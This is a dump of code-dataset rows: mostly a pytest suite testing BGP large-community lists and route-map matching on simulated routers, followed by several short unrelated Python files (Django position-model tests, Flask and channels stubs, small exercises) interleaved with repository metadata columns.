assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_4 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_all(request):
"""
This test is to verify that Match_ALL clause should pass
only if ALL of the L-comm values configured (horizontally)
in the community list are present in the prefix. There
could be additional L-communities in the prefix that are
not present in the L-comm list.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"set": {
"large_community": {
"num": "1:1:1 1:2:3 2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"
}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "ALL",
"value": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {"large-community-list": {"id": "ALL"}},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_4 = {"largeCommunity": "1:1:1 1:2:3 2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_any(request):
"""
This test is to verify that Match_ANY clause should pass
only if at-least any one L-comm value configured(vertically)
in large-community list, is present in prefixes.
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {"num": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:1:1",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:2:1",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:3:1",
"large": True,
},
{
"community_type": "standard",
"action": "permit",
"name": "ANY",
"value": "2:4:1",
"large": True,
},
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {"large-community-list": {"id": "ANY"}},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_7 = {"largeCommunity": "2:1:1 2:2:2 2:3:3 2:4:4 2:5:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_7)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
def test_large_community_lists_with_rmap_match_regex(request):
"""
This test is to verify large-community lists" operation in a route-map
with match RegEx statements. Match clause should pass only if the
complete string of L-comm values are matched
"""
tgen = get_topogen()
tc_name = request.node.name
write_test_header(tc_name)
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# Creating configuration from JSON
reset_config_on_routers(tgen)
step("Create route map")
input_dict_2 = {
"r2": {
"route_maps": {
"RM_R4_OUT": [
{
"action": "permit",
"seq_id": "10",
"set": {
"large_community": {
"num": "1:1:1 1:1:2 2:1:3 2:1:4 2:1:5",
},
"community": {"num": "1:1 1:2 1:3 1:4 1:5"},
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_3 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"advertise_networks": [{"network": "200.50.2.0/32"}]
}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
},
"r2": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r4": {
"dest_link": {
"r2": {
"route_maps": [
{
"name": "RM_R4_OUT",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
},
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create standard large commumity-list")
input_dict_4 = {
"r4": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "ALL",
"value": "1:1:1 2:1:3 2:1:4 2:1:5",
"large": True,
},
{
"community_type": "expanded",
"action": "permit",
"name": "EXP_ALL",
"value": "1:1:1 2:1:[3-5]",
"large": True,
},
]
}
}
result = create_bgp_community_lists(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify BGP large community is created")
result = verify_create_community_list(tgen, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "10",
"match": {
"large_community_list": {
"id": "ALL",
},
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Configure neighbor for route map")
input_dict_6 = {
"r4": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r2": {
"dest_link": {
"r4": {
"route_maps": [
{"name": "RM_R4_IN", "direction": "in"}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_7 = {"largeCommunity": "1:1:1 1:1:2 2:1:3 2:1:4 2:1:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(tgen, adt, dut, NETWORKS[adt], input_dict_7)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
step("Delete route map reference by community-list")
input_dict_3 = {"r4": {"route_maps": ["RM_R4_IN"]}}
result = delete_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Create route map")
input_dict_5 = {
"r4": {
"route_maps": {
"RM_R4_IN": [
{
"action": "permit",
"seq_id": "20",
"match": {
"large_community_list": {
"id": "EXP_ALL",
},
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("clear ip bgp")
result = clear_bgp_and_verify(tgen, topo, "r4")
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
step("Verify large-community-list")
dut = "r4"
input_dict_7 = {"largeCommunity": "1:1:1 1:1:2 2:1:3 2:1:4 2:1:5"}
for adt in ADDR_TYPES:
result = verify_bgp_community(
tgen, adt, dut, NETWORKS[adt], input_dict_7, expected=False
)
assert result is not True, (
"Testcase {} : Failed \n "
"largeCommunity is still present \n Error: {}".format(tc_name, result)
)
write_test_footer(tc_name)
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
| 35.012086
| 91
| 0.366238
| 6,349
| 78,217
| 4.31627
| 0.0619
| 0.041381
| 0.031966
| 0.04992
| 0.867611
| 0.855569
| 0.844548
| 0.837469
| 0.823748
| 0.806561
| 0
| 0.035191
| 0.5317
| 78,217
| 2,233
| 92
| 35.027765
| 0.71296
| 0.090645
| 0
| 0.565804
| 0
| 0.011327
| 0.184747
| 0.000482
| 0
| 0
| 0
| 0.000448
| 0.039374
| 1
| 0.00863
| false
| 0
| 0.004854
| 0
| 0.013484
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6be6f9a2cd0c9d9f5f904f3120f1946f91b59203
| 114
|
py
|
Python
|
examples/set.difference_update/ex3.py
|
mcorne/python-by-example
|
15339c0909c84b51075587a6a66391100971c033
|
[
"MIT"
] | null | null | null |
examples/set.difference_update/ex3.py
|
mcorne/python-by-example
|
15339c0909c84b51075587a6a66391100971c033
|
[
"MIT"
] | null | null | null |
examples/set.difference_update/ex3.py
|
mcorne/python-by-example
|
15339c0909c84b51075587a6a66391100971c033
|
[
"MIT"
] | null | null | null |
# s.difference_update({1, 2, 3}, {4, 10})
s = {1, 2, 3, 4, 5, 6}
s.difference_update({1, 2, 3}, {4, 10})
print(s)
| 22.8
| 41
| 0.535088
| 25
| 114
| 2.36
| 0.44
| 0.101695
| 0.152542
| 0.20339
| 0.779661
| 0.779661
| 0.779661
| 0.779661
| 0
| 0
| 0
| 0.191489
| 0.175439
| 114
| 4
| 42
| 28.5
| 0.43617
| 0.342105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e2b2988812b421498416fa36a17d5c7f4e0676a
| 249
|
py
|
Python
|
got/controllers/__init__.py
|
pdiogenes/got_listing
|
72493c232cafd4afde8ad06912ceae868ed63207
|
[
"MIT"
] | null | null | null |
got/controllers/__init__.py
|
pdiogenes/got_listing
|
72493c232cafd4afde8ad06912ceae868ed63207
|
[
"MIT"
] | null | null | null |
got/controllers/__init__.py
|
pdiogenes/got_listing
|
72493c232cafd4afde8ad06912ceae868ed63207
|
[
"MIT"
] | null | null | null |
from got.controllers.battles_controller import blueprint as battles
from got.controllers.character_deaths_controller import blueprint as character_deaths
from got.controllers.character_predictions_controller import blueprint as character_predictions
| 83
| 95
| 0.907631
| 31
| 249
| 7.064516
| 0.354839
| 0.09589
| 0.246575
| 0.369863
| 0.328767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068273
| 249
| 3
| 95
| 83
| 0.943966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
2e51331e960f5cd17f5aa3d5eb66a76b74cb7a40
| 7,711
|
py
|
Python
|
test_ella/test_positions/test_models.py
|
petrlosa/ella
|
120eac56b46b7b79cdeea0582d2711f5a4b0bf51
|
[
"BSD-3-Clause"
] | 75
|
2015-01-17T08:30:08.000Z
|
2022-02-23T19:05:36.000Z
|
test_ella/test_positions/test_models.py
|
petrlosa/ella
|
120eac56b46b7b79cdeea0582d2711f5a4b0bf51
|
[
"BSD-3-Clause"
] | 3
|
2016-04-21T22:16:37.000Z
|
2021-07-08T12:47:37.000Z
|
test_ella/test_positions/test_models.py
|
petrlosa/ella
|
120eac56b46b7b79cdeea0582d2711f5a4b0bf51
|
[
"BSD-3-Clause"
] | 26
|
2015-02-12T04:13:41.000Z
|
2022-01-08T05:26:27.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from test_ella.cases import RedisTestCase as TestCase
from nose import tools
from django.template import Context, NodeList
from django.contrib.contenttypes.models import ContentType
from django.db.models import Max
from django.core.exceptions import ValidationError
from test_ella.test_core import create_basic_categories
from ella.positions.models import Position
from ella.utils.timezone import now, utc_localize
class TestPosition(TestCase):
def setUp(self):
super(TestPosition, self).setUp()
create_basic_categories(self)
def test_validation_fails_for_globaly_active_positions(self):
Position.objects.create(category=self.category, name='position-name', text='some text')
p = Position(category=self.category, name='position-name', text='other text')
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_fails_for_overlapping_positions(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_till=utc_localize(datetime(2010, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text')
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_fails_for_overlapping_positions2(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_till=utc_localize(datetime(2010, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text', active_from=utc_localize(datetime(2010, 9, 10)))
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_fails_for_overlapping_positions3(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_from=utc_localize(datetime(2010, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text', active_till=utc_localize(datetime(2010, 10, 11)))
tools.assert_raises(ValidationError, p.full_clean)
def test_validation_passes_for_nonoverlapping_positions(self):
Position.objects.create(category=self.category, name='position-name', text='some text', active_till=utc_localize(datetime(2010, 10, 10, 10, 10, 10)))
p = Position(category=self.category, name='position-name', text='other text', active_from=utc_localize(datetime(2010, 10, 10, 10, 10, 10)))
p.full_clean()
def test_validation_fails_for_incorrect_generic_fk(self):
p = Position(category=self.category, name='position-name', target_ct=ContentType.objects.get_for_model(Position), target_id=123455)
tools.assert_raises(ValidationError, p.full_clean)
def test_render_position_without_target_renders_txt(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals('some text', p.render(Context({}), NodeList(), ''))
def test_render_position_with_invalid_target_returns_empty(self):
target_ct = ContentType.objects.get_for_model(ContentType)
invalid_id = ContentType.objects.aggregate(Max('id'))['id__max'] + 1
p = Position.objects.create(category=self.category, name='position-name', text='some text', target_ct=target_ct, target_id=invalid_id)
tools.assert_equals('', p.render(Context({}), NodeList(), ''))
def test_get_active_position(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals(p, Position.objects.get_active_position(self.category, 'position-name'))
def test_get_active_position_nofallback(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals(p, Position.objects.get_active_position(self.category, 'position-name', nofallback=True))
def test_get_active_position_inherit(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_get_active_position_inherit_nofallback(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text')
tools.assert_false(Position.objects.get_active_position(self.category_nested, 'position-name', nofallback=True))
def test_get_active_position_empty(self):
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_active_till_past(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_till=now()-timedelta(days=1))
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_active_from_future(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_from=now()+timedelta(days=1))
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_active_till_future(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_till=now()+timedelta(days=1))
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_active_from_past(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', active_from=now()-timedelta(days=1))
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_active_from_till_match(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text',
active_from=now()-timedelta(days=1),
active_till=now()+timedelta(days=1),
)
tools.assert_equals(p, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_active_from_till_no_match(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text',
active_from=now()-timedelta(days=3),
active_till=now()-timedelta(days=1),
)
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_more_positions_one_active(self):
n = now()
p1 = Position.objects.create(category=self.category, name='position-name', text='some text',
active_from=n-timedelta(days=1),
)
p2 = Position.objects.create(category=self.category, name='position-name', text='some text', active_till=n-timedelta(days=1))
tools.assert_equals(p1, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_not_disabled(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', disabled=False)
tools.assert_equals(p, Position.objects.get_active_position(self.category, 'position-name'))
def test_disabled(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', disabled=True)
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_position_with_broken_definition_dont_raise_big_500(self):
p = Position.objects.create(category=self.category, name='position-name', text='{% load nonexistent_tags %}', disabled=False)
tools.assert_equals('', p.render(Context({}), NodeList(), ''))
| 58.416667
| 157
| 0.733109
| 1,011
| 7,711
| 5.383778
| 0.115727
| 0.092596
| 0.102884
| 0.123461
| 0.833364
| 0.825648
| 0.806724
| 0.772552
| 0.75271
| 0.729745
| 0
| 0.014008
| 0.139022
| 7,711
| 131
| 158
| 58.862595
| 0.805844
| 0.002723
| 0
| 0.292929
| 0
| 0
| 0.107975
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.242424
| false
| 0.010101
| 0.10101
| 0
| 0.353535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e8157d0057883a9f254fc0a474914098a9d53ef
| 125
|
py
|
Python
|
game/consumers/chat_consumer.py
|
smrsan/django-backgammon-server
|
02eee8fea2c4aa0e40b333a35b0bb09d7b444230
|
[
"MIT"
] | null | null | null |
game/consumers/chat_consumer.py
|
smrsan/django-backgammon-server
|
02eee8fea2c4aa0e40b333a35b0bb09d7b444230
|
[
"MIT"
] | 6
|
2021-03-18T22:43:08.000Z
|
2021-09-22T18:31:02.000Z
|
game/consumers/chat_consumer.py
|
smrsan/django-backgammon-server
|
02eee8fea2c4aa0e40b333a35b0bb09d7b444230
|
[
"MIT"
] | null | null | null |
from channels.generic.websocket import AsyncJsonWebsocketConsumer
class ChatConsumer(AsyncJsonWebsocketConsumer):
pass
| 20.833333
| 65
| 0.856
| 10
| 125
| 10.7
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104
| 125
| 5
| 66
| 25
| 0.955357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
cf217ec2c668980f77926956ee45dbdf480f78c0
| 245
|
py
|
Python
|
takeaway/settings/flask/models.py
|
ShahinZeynalov/startapp
|
3470666114dad3563393ea976cac8daa03611c41
|
[
"MIT"
] | 1
|
2020-06-08T06:54:08.000Z
|
2020-06-08T06:54:08.000Z
|
takeaway/settings/flask/models.py
|
ShahinZeynalov/startapp
|
3470666114dad3563393ea976cac8daa03611c41
|
[
"MIT"
] | null | null | null |
takeaway/settings/flask/models.py
|
ShahinZeynalov/startapp
|
3470666114dad3563393ea976cac8daa03611c41
|
[
"MIT"
] | null | null | null |
flask_model ='''
from extensions.extension import Model,String,Integer,Column,DateTime,ForeignKey,relationship
from extensions.extension import db
from sqlalchemy.sql import func
from sqlalchemy.exc import InvalidRequestError,IntegrityError
'''
| 35
| 93
| 0.84898
| 29
| 245
| 7.137931
| 0.655172
| 0.135266
| 0.222222
| 0.280193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077551
| 245
| 7
| 94
| 35
| 0.915929
| 0
| 0
| 0
| 0
| 0
| 0.918699
| 0.382114
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf304937e634e8422f1ac726bca949c7cbc5ede0
| 960
|
py
|
Python
|
week_5_Jun_17/caught_speeding/test_ron_solution.py
|
FunWithPythonProgramming/coding-bat-exercises
|
0383fb5ebbea2befac21791e3cfc8a393abf9b4a
|
[
"MIT"
] | null | null | null |
week_5_Jun_17/caught_speeding/test_ron_solution.py
|
FunWithPythonProgramming/coding-bat-exercises
|
0383fb5ebbea2befac21791e3cfc8a393abf9b4a
|
[
"MIT"
] | 8
|
2020-02-18T03:18:09.000Z
|
2022-01-13T02:53:27.000Z
|
week_5_Jun_17/caught_speeding/test_ron_solution.py
|
FunWithPythonProgramming/coding-bat-exercises
|
0383fb5ebbea2befac21791e3cfc8a393abf9b4a
|
[
"MIT"
] | null | null | null |
from ron_solution import caught_speeding
def test_caught_speed_60_false():
assert(caught_speeding(60, False)) == 0
def test_caught_speed_65_false():
assert(caught_speeding(65, False)) == 1
def test_caught_speed_65_true():
assert(caught_speeding(65, True)) == 0
def test_caught_speed_80_false():
assert(caught_speeding(80, False)) == 1
def test_caught_speed_85_false():
assert(caught_speeding(85, False)) == 2
def test_caught_speed_85_true():
assert(caught_speeding(85, True)) == 1
def test_caught_speed_70_false():
assert(caught_speeding(70, False)) == 1
def test_caught_speed_75_false():
assert(caught_speeding(75, False)) == 1
def test_caught_speed_75_true():
assert(caught_speeding(75, True)) == 1
def test_caught_speed_40_false():
assert(caught_speeding(40, False)) == 0
def test_caught_speed_40_true():
assert(caught_speeding(40, True)) == 0
def test_caught_speed_90_false():
assert(caught_speeding(90, False)) == 2
| 25.263158
| 42
| 0.755208
| 150
| 960
| 4.42
| 0.153333
| 0.27451
| 0.235294
| 0.325792
| 0.40724
| 0.361991
| 0.078431
| 0
| 0
| 0
| 0
| 0.071006
| 0.119792
| 960
| 37
| 43
| 25.945946
| 0.713609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.48
| 1
| 0.48
| true
| 0
| 0.04
| 0
| 0.52
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
cf52e48cbd90ac9d187fd359c788718b02d2e85b
| 73
|
py
|
Python
|
my_math.py
|
ppwadhwa/git-tutorial
|
713f500d513565e58c8af04cad3a7017401f8842
|
[
"MIT"
] | null | null | null |
my_math.py
|
ppwadhwa/git-tutorial
|
713f500d513565e58c8af04cad3a7017401f8842
|
[
"MIT"
] | null | null | null |
my_math.py
|
ppwadhwa/git-tutorial
|
713f500d513565e58c8af04cad3a7017401f8842
|
[
"MIT"
] | null | null | null |
def my_add(a, b):
return a + 2*b
def my_mult(a, b):
return a*b*2
| 14.6
| 18
| 0.561644
| 18
| 73
| 2.166667
| 0.444444
| 0.153846
| 0.410256
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 0.273973
| 73
| 5
| 19
| 14.6
| 0.698113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d8566a7ec94ec69ba4bea4aa46cf7ed98b1c1d66
| 2,535
|
py
|
Python
|
tests/unit/nodes/filters/test_collate.py
|
brendanhasz/drainpype
|
a183acec7cae1ef9fde260868e2b021516a8cd7f
|
[
"MIT"
] | 2
|
2021-03-03T12:11:24.000Z
|
2021-03-18T15:09:52.000Z
|
tests/unit/nodes/filters/test_collate.py
|
brendanhasz/pipedown
|
a183acec7cae1ef9fde260868e2b021516a8cd7f
|
[
"MIT"
] | null | null | null |
tests/unit/nodes/filters/test_collate.py
|
brendanhasz/pipedown
|
a183acec7cae1ef9fde260868e2b021516a8cd7f
|
[
"MIT"
] | null | null | null |
